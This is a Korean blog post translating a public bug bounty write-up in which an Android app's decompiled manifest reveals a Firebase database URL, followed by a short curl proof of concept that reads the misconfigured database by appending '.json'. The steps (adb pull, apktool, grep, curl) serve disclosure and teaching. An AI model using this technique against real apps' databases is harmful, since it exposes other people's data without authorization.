AndroidManifest.xml Firebase 설정 오류

공개된 Bug Bounty Report를 번역한 글입니다.

https://omespino.com/write-up-private-bug-bounty-firebase-database-exposed-by-misconfiguration-2000-usd/

안드로이드에서 발견할 수 있는 간단한 취약점이지만 $2000의 큰 포상금을 받아서 가져온 글 입니다.

취약점 요약 : 잘못 구성된 Android Manifest.xml 파일에서 Firebase의 instance URL 노출

취약점 설명

1. Apk 파일을 추출

adb pull data/app/com.REDACTED.android.main/base.apk

2. Apk 파일 디컴파일

apktool d base.apk

3. base/AndroidManifest.xml 파일에서 Firebase 및 HTTP 문자열을 grep

# grep for firebase and HTTP strings and got some URLs including the firebaseio.com one
omespino@h0st:~# grep -ir firebase | grep http 
- redacted - 
 ...
 ...
 "https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/"
 ...
 ...
- redacted -

4. Firebase의 구성 오류를 확인하기 위한 간단한 POC (URl에 .json을 추가하기만 하면 됨)

omespino@h0st:~# curl -X GET -H "REDACTED-Security: @omespino" https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/.json

5. 잘못구성된 url과 잘못된 권한으로 누구나 firebase의 database 를 볼 수 있음

AndroidManifest.xml Firebase 설정 오류

공개된 Bug Bounty Report를 번역한 글입니다.

취약점 설명

Anaconda & Frida 설치

AOS Cheat Sheet

How to Rotate IP Address with Burp

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

AndroidManifest.xml Firebase 설정 오류

공개된 Bug Bounty Report를 번역한 글입니다.

취약점 설명

Anaconda & Frida 설치

AOS Cheat Sheet

You may also like

How to Rotate IP Address with Burp

Latest Posts

Web3 자료 모음

토큰기반 인증에서 bearer 란?

Explore Tags